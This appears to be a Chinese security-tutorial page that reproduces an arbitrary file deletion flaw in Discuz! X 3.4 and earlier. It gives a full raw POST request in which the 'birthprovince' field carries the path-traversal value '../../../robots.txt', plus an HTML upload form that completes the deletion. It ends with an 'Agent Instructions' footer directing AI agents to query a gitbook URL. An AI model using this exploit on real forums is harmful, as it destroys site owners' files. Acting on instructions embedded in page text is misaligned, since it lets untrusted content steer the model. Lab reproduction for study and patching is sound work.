# 5.8.1 Discuz任意文件删除

影响版本：Discuz!X ≤3.4

漏洞详情：<https://lorexxar.cn/2017/09/30/dz-delete/>

漏洞复现

安装Discuz X3.4

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1338839j30ub0nlq4o.jpg)

安装完成之后,先访问一下robot.txt,确定其文件存在(我的已经被删了,借网上的图)

[![img](https://github.com/Louisnie/vulhub/raw/master/discuz/x3.4-arbitrary-file-deletion/2.png)](https://github.com/Louisnie/vulhub/blob/master/discuz/x3.4-arbitrary-file-deletion/2.png)

然后注册个普通用户账户,在个人资料处找到找到自己的formhash：

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1hol151j31360ry76v.jpg)

带上自己的Cookie、formhash发送如下数据包：

```
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: 192.168.174.128
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:JSESSIONID=FV4fcRqDD8dnQ6QV2fW2QF7sLWGQR54w9NHs1ND3nvpX42M3dFKy!1896303974; Gyeu_2132_saltkey=KE98Psrp; Gyeu_2132_lastvisit=1557226499; Gyeu_2132_sid=BD3lOL; Gyeu_2132_lastact=1557230363%09home.php%09spacecp; Gyeu_2132_onlineusernum=1; Gyeu_2132_seccode=1.ed6d0543029810d816; Gyeu_2132_ulastactivity=9feaQBwFs5A3KtNxNbXCfi5U8MG5lhcZFxonFJWtIN0wKGLcpFE6; Gyeu_2132_auth=35fdP7M1CDLaPPh3CcHBuLE%2FS5%2Byho%2FBy8kE%2FF3llJTtEYgnGajkeuR3mkozjRnUlaFIHVDva6IRFNRBxDf%2F; Gyeu_2132_home_readfeed=1557230307; Gyeu_2132_noticeTitle=1
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

3d86b691                   //此处为个人的formhash
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../robots.txt                //指定目录为robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
```

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1k0qrkxj30zf0l3acm.jpg)

提交成功之后，用户资料修改页面上的出生地就会显示成下图所示的状态：

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1lwe9cej30i60co3yg.jpg)

然后本地在构造一个上传的HTML文件,用浏览器打开

代码如下，将其中的`[your-ip]`改成discuz的域名，`[form-hash]`改成你的formhash：

```
<body>
    <form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>
```

任意上传一个图片,

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1unae9lj30p70c4jrd.jpg)然后上传成功之后再去访问robot.txt,发现其文件已被删除

![](http://ww1.sinaimg.cn/large/0078beR7ly1g2t1st7ihlj30qi0gkt9e.jpg)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ninjia.gitbook.io/secskill/cms/discuz/dzdelete.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.